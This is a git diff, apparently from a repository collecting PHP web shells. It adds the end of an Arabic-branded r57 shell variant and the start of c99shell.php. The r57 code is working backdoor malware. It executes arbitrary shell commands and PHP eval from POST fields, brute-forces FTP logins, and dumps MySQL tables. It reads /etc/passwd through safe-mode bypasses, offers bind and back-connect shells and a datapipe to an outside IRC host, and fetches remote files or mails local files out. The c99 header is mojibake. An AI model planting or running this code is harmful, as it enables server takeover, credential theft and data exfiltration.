case 'test8': + if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118']; + else echo $lang[$language.'_text119']; + break; + } +} +else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){ + $cmd_rep = ex($_POST['cmd']); + if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } + else { echo @htmlspecialchars($cmd_rep)."\n"; }} +if ($_POST['cmd']=="ftp_brute") + { + $suc = 0; + foreach($users as $user) + { + $connection = @ftp_connect($ftp_server,$ftp_port,10); + if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; } + else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } } + @ftp_close($connection); + } + echo "\r\n-------------------------------------\r\n"; + $count = count($users); + if(isset($_POST['reverse'])) { $count *= 2; } + echo $lang[$language.'_text97'].$count."\r\n"; + echo $lang[$language.'_text98'].$suc."\r\n"; + } +if ($_POST['cmd']=="php_eval"){ + $eval = @str_replace("<?","",$_POST['php_eval']); + $eval = @str_replace("?>","",$eval); + @eval($eval);} +if ($_POST['cmd']=="mysql_dump") + { + if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); } + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; } + else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; } + else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; } + else { + if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; } + else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); } + else { echo "[-] ERROR! Can't write in dump file"; } + } + } +echo "</textarea></div>"; +echo "</b>"; +echo "</td></tr></table>"; +echo "<table width=100% cellpadding=0 cellspacing=0>"; +function div_title($title, $id) +{ + return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>'; +} +function div($id) + { + if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">'; + return '<div id="'.$id.'">'; + } +if(!$safe_mode){ +echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts; +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,'')); +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +else{ +echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts; +echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text200'],'id3').$table_up2.div('id3').$ts; +echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','snn',85,'/etc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text300'],'id3').$table_up2.div('id3').$ts; +echo sr(15,"<b>".$lang[$language.'_text302'].$arrow."</b>",in('text','SnIpEr_SA',85,'/etc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +if($safe_mode){ +echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts; +echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode && $unix){ +echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts; +echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(!$safe_mode){ +$aliases2 = ''; +foreach ($aliases as $alias_name=>$alias_cmd) + { + $aliases2 .= "<option>$alias_name</option>"; + } +echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts; +echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts; +echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +if(!$safe_mode && $unix){ +echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ts; +echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font; +echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>"; +echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");")); +echo "</textarea>"; +echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); +echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); +echo "</div></div></font>"; +echo $table_end1.$fe; +if($safe_mode&&$curl_on) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$mysql_on) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id12').$table_up2.div('id12').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306")))); +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$mssql_on) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$unix&&function_exists('mb_send_mail')){ +echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id22').$table_up2.div('id22').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&function_exists('imap_list')){ +echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id23').$table_up2.div('id23').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&function_exists('imap_body')){ +echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id24').$table_up2.div('id24').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id25').$table_up2.div('id25').$ts; +echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8')); +echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(@ini_get('file_uploads')){ +echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; +echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,'')); +echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(!$safe_mode&&$unix){ +echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts; +echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://')); +echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts; +echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14'])); +$arh = $lang[$language.'_text92']; +if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } +if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } +if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } +echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh); +echo $te.'</div>'.$table_end1.$fe; +if(@function_exists("ftp_connect")){ +echo $table_up1.div_title($lang[$language.'_text93'],'id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down')); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up')); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +if($unix && @function_exists("ftp_connect")){ +echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts; +echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo sr(15,"","<font face=tahoma size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>"); +echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']); +echo $te.'</div>'.$table_end1.$fe; +} +if(@function_exists("mail")){ +echo $table_up1.div_title($lang[$language.'_text102'],'id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy")))); +echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>'); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +if($mysql_on||$mssql_on||$pg_on||$ora_on) +{ +$select = '<select name=db>'; +if($mysql_on) $select .= '<option>MySQL</option>'; +if($mssql_on) $select .= '<option>MSSQL</option>'; +if($pg_on) $select .= '<option>PostgreSQL</option>'; +if($ora_on) $select .= '<option>Oracle</option>'; +$select .= '</select>'; +echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>"; +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); +echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); +echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>"; +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),""); +echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>"; +} +if(!$safe_mode&&$unix){ +echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")))); +echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru')); +echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667')); +echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=tahoma size=-2><b>o---[ SnIpEr_SA Shell | <a href=http://3asfh.net>http://3asfh.net</a> | <a SnIpEr.SA@hotmail.com>sniper.sa@hotmail.com</a> | تعريب وتطوير ]---o</b></font></div></td></tr></table>".$f; + + +$u1p=""; // File to Include... or use _GET _POST +$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp + + + +echo "<PRE>\n"; +if(empty($snn)){ +if(empty($_GET['snn'])){ +if(empty($_POST['snn'])){ +die("\nSnIpEr_SA"); +} else { +$u1p=$_POST['snn']; +} +} else { +$u1p=$_GET['snn']; +} +} + +$temp=tempnam($tymczas, "cx"); + +if(copy("compress.zlib://".$snn, $temp)){ +$zrodlo = fopen($temp, "r"); +$tekst = fread($zrodlo, filesize($temp)); +fclose($zrodlo); +echo "".htmlspecialchars($tekst).""; +unlink($temp); + +} else { +die("<FONT COLOR=\"RED\"><CENTER> +<B>".htmlspecialchars($u1p)."</B> عفوا! الملف غير موجود او ليس لديك الصلاحيه للدخول.</CENTER></FONT>"); +} + +?> \ No newline at end of file diff --git a/php/PHPshell/c99/c99.jpg b/php/PHPshell/c99/c99.jpg new file mode 100644 index 0000000..91ca406 Binary files /dev/null and b/php/PHPshell/c99/c99.jpg differ diff --git a/php/PHPshell/c99/c99.php b/php/PHPshell/c99/c99.php new file mode 100644 index 0000000..dc6d688 --- /dev/null +++ b/php/PHPshell/c99/c99.php @@ -0,0 +1,3069 @@ +<?php +/* +****************************************************************************************************** +* +* c99shell.php v.1.0 pre-release build #13 +* Freeware license. +* آ© CCTeaM. +* c99shell - أ´أ أ©أ«-أ¬أ¥أ­أ¥أ¤أ¦أ¥أ° أ·أ¥أ°أ¥أ§ www-أ،أ°أ®أ³أ§أ¥أ°, "أ§أ أ²أ®أ·أ¥أ­أ»أ©" أ¤أ«أ؟ أ¢أ§أ«أ®أ¬أ . +* أ‚أ» أ¬أ®أ¦أ¥أ²أ¥ أ،أ¥أ±أ¯أ«أ أ²أ­أ® أ±أھأ أ·أ أ²أ¼ أ¯أ®أ±أ«أ¥أ¤أ­أ¾أ¾ أ¢أ¥أ°أ±أ¨أ¾ أ­أ  أ¤أ®أ¬أ أ¸أ­أ¥أ© أ±أ²أ°أ أ­أ¨أ·أھأ¥ أ¯أ°أ®أ¤أ³أھأ²أ : + http://ccteam.ru/releases/c99shell +* +* WEB: http://ccteam.ru +* ICQ UIN #: 656555 +* +* أژأ±أ®أ،أ¥أ­أ­أ®أ±أ²أ¨: +* + أ³أ¯أ°أ أ¢أ«أ¥أ­أ¨أ¥ أ«أ®أھأ أ«أ¼أ­أ»أ¬أ¨ أ¨ أ³أ¤أ أ«أ¥أ­أ­أ»أ¬أ¨ (ftp, samba) أ´أ أ©أ«أ أ¬أ¨/أ¯أ أ¯أھأ أ¬أ¨, أ±أ®أ°أ²أ¨أ°أ®أ¢أھأ  +* أ§أ أھأ أ·أ¨أ¢أ أ­أ¨أ¥ أ±أھأ أ·أ¨أ¢أ أ­أ¨أ¥ أ´أ أ©أ«أ®أ¢ أ¨ أ¯أ أ¯أ®أھ +* (أ¯أ°أ¥أ¤أ¢أ®أ°أ¨أ²أ¥أ«أ¼أ­أ® أ³أ¯أ أھأ®أ¢أ»أ¢أ 